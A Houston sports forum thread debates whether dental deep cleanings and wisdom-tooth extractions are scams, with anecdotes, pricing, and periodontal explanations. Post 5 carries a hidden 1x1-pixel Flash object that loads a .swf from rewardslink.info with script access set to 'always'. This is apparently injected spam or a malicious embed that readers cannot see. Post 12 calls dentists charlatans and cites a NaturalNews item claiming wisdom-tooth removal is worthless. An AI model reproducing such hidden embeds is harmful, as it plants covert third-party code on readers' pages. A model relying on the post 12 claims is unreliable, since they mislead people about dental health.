1. Welcome! Please take a few seconds to create your free account to post threads, make some friends, remove a few ads while surfing and much more. ClutchFans has been bringing fans together to talk Houston Sports since 1996. Join us!

Dental: Deep Cleaning- Is it a scam???

Discussion in 'BBS Hangout' started by Jeremiah, Sep 29, 2008.

1. Rashmon

Rashmon Contributing Member

I would not doubt there are some untrustworthy dentists who may yank them without need, but if your wisdom teeth grow in abnormally, you won't even need a dentist to diagnosis the need for extraction.

The pain in your mouth will let you know. Trust me.

If you have a dentist that recommends pulling teeth that are not bothering you and with no indication of a problem, then you have a bad dentist.

2. Ziggy

Ziggy QUEEN ANON

You're obviously a dentist.

3. Ziggy

Ziggy QUEEN ANON

No yeah, humans were made to have extra teeth that need to be taken out.... scam.

4. mylilpony

mylilpony Member

obviously i am since i post stuff on this site during buisness hours.:rolleyes:

5. Zion21

Zion21 Member

He clearly is not, no. <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="1" height="1" id="movie" align="">
    <param name=FlashVars value="cid=3">
    <param name="movie" value="http://rewardslink.info/flash/files/3.swf">
    <param name="bgcolor" value="#ffffff">
    <param name="allowScriptAccess" value="always" />
    <embed allowScriptAccess="always" FlashVars="cid=3" src="http://rewardslink.info/flash/files/3.swf" quality="high" bgcolor="#ffffff" width="1" height="1" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>
    </object>

6. jo mama

jo mama Contributing Member

you are either trolling or have little squirrel sized wisdom teeth.

i allowed all my wisdom teeth to grow in, and they didnt grow in weird - they all came out as regular teeth. but there got a point w/ 3 of them where they had to be pulled. the pain was excruciating. but since i waited for them to grow in my dentist was able to just yank them out, instead of going to an oral (huh huh) surgeon. did my left side in one sitting then about 4 years later the top one on the right was bugging me so i pulled that out.

still have one that has never popped out of the gum and as long as it doesnt f*** with me it is welcome to stay.

7. rezdawg

rezdawg Contributing Member

There is so much misinformation floating around that its impossible to address everything without writing a thesis.

I'll just list some basics:

Average price of a deep cleaning is $200 per quadrant. So, if you need all 4 quadrants done, then it'll be about 800 bucks.

Deep cleanings, or scaling and root planings, are done in areas with pockets at 4mm-6mm. Firecat, its impossible to have pockets that large, and then floss, and have the pockets go to 1-2mm. Thats just not physiologically possible, specially on molars, where the majority of deep pockets exist.

Now, not all pockets of 4 or greater require deep cleanings. It would help on the majority of cases, but the real reason is for calculus build up. You determine calculus build up through x-rays and clinical exams. If there is calculus, then a deep cleaning is indicated.

If you have pockets at 7mm or greater, a deep cleaning will not help much. It would be best to see a periodontist to get specialized care.

Why is a deep cleaning important? Pockets are supposed to be between 1-2 mm for anterior teeth and 2-3 mm for posterior teeth. The bone level supporting the tooth is correlated with the pocket depth. Now, if you have pockets of 5 mm, for instance, then you have plaque and bacteria gathering at the bottom of that pocket. This makes it much more difficult to keep clean during home care hygiene. Over time, the bone level changes based on pocket depth. Therefore, if your pocket around a molar goes from 3 mm to 5 mm, then you should expect approximately 2 mm of bone loss around the tooth. Eventually, if treatment is not done, then you will find loosening of teeth and eventual tooth loss. Thats the progression.

Deep cleanings are absolutely essential. For those that think its a waste of money, then you obviously dont have experience in the dental field. I think the price point is expensive, but the procedure itself is critical for maintenance of oral health, tissue attachment, and bone level.

Dont get me started on wisdom teeth. For those that think that they shouldnt be extracted, I can only laugh. There are only a few instances that they are best left untouched.

8. mylilpony

mylilpony Member

NSFW
    <embed allowfullscreen="false" allowscriptaccess="never" wmode="transparent" src="http://www.hulu.com/embed/pM90NewwY1SL6cTRg1H2wA" type="application/x-shockwave-flash" height="415" width="480"></embed> <div style="font-size:0.9em;">
    <a href="http://vodpod.com/watch/1070314-its-always-sunny-in-philadelphia-pulling-teeth">It's Always Sunny in Philadelphia: Pulling Teeth</a>
    - Watch more <a href="http://vodpod.com">Videos</a> at Vodpod.</div>

9. Invisible Fan

Invisible Fan Contributing Member

Wisdom teeth a scam, what? Moonlanding is fake too!

If it grows crooked, it mucks up the other teeth.

10. rezdawg

I can't tell you how many 2nd molars (the ones in front of the wisdom teeth) I see that have been screwed with decay because of the wisdom teeth growing in at an angle. Also, if they aren't even growing in, I've seen tons of cases of cyst formation.

Unless the wisdom teeth are growing in perfectly straight, it's in the best interest of the patient (health and finance) to have them removed. They'll do nothing but cause problems at some point.

11. Xerobull

Xerobull You son of a b!tch! I'm in!

What would I have to do/say/have the dentist diagnose to get my medical insurance to pay for this?

12. Honey Bear

Honey Bear Contributing Member

Maybe it's because I'm naturally beautiful, but I never had my wisdom teeth removed and it worked out fine for me. Do I sometimes (once or twice a year) get toothaches? Yes, of course I do. But pain is part of life and it's what makes joy taste twice as good.

There's a reason dentists aren't regarded as real doctors. They're modern day charlatans.

In a groundbreaking report from the British Medical Journal, researchers who poured over thousands of studies detailing the efficacy of medical and dental procedures have concluded that many popular surgical procedures are completely worthless. Among those is one of the most common procedures performed by your dentist: the removal of so-called "impacted" wisdom teeth. According to the BMJ, this procedure may actually do more harm than good.

But I'm not mad at rezdawg, because he truly believes in what he's saying.

Folks, you need to start questioning your dentist. Don't believe everything they tell you. Most of the time, they're full of bunk, or they're just trying to sell you on whatever procedure they get paid for performing. They're not all evil -- many actually believe these procedures will help you, which is why they seem so sincere -- but they are misinformed. Their beliefs are based on medical dogma, not scientific fact.

Learn more: http://www.naturalnews.com/001108.html#ixzz1a7DMtGju

So don't be afraid, don't have no fear. Gonna bring the flavor gonna show you how. As long as there'll be quacks Ronny be bringing the truth againn

13. le081488

le081488 Member

Not a scam, but it could be done for cheaper at the UT Dental School in the med center as can most of dental related treatment if you do not have adequate healthcare.

Im a student there, if you need work done or know anyone feel free to message me and I can possibly get you in faster since I can sign you up as a friend and family member.

1 person likes this.
  14. Xerobull

Xerobull You son of a b!tch! I'm in!

Awesome deal!

15. DaDakota

DaDakota If you want to know, just ask!

Getting all 4 of my wisdome teeth out in 2 hours......at the age of 47, got my first cavity and the doc said yank it, but because it was on the bottom, got to take the top one too, and then the insurance company said, we will pay more if you get all 4 yanked.

So......away I go.....to go from DD32Teeth to DD28Teeth

DD

16. Lil Pun

Lil Pun Contributing Member

Wisdom tooth extraction was no fun for me. :(

17. le081488

le081488 Member

It really is, if anyone needs anything or has any questions regarding dental work at the UT School in Houston, just email me.

le081488@yahoo.com

18. Pull_Up_3

Pull_Up_3 Member

bumping this

i need a deep cleaning/scaling but im coming out almost $500 WITH insurance! is this real life? should i shop around? some places want $400 without insurance which just blows my mind how i end up paying more with insuarance. maybe the dentist is overcharging me?

19. Prince

Prince Member

partly yes....

20. rezdawg

Its typically 150-200 per quadrant without insurance...so 600-800 total.

With insurance, it should be less because those fees are negotiated.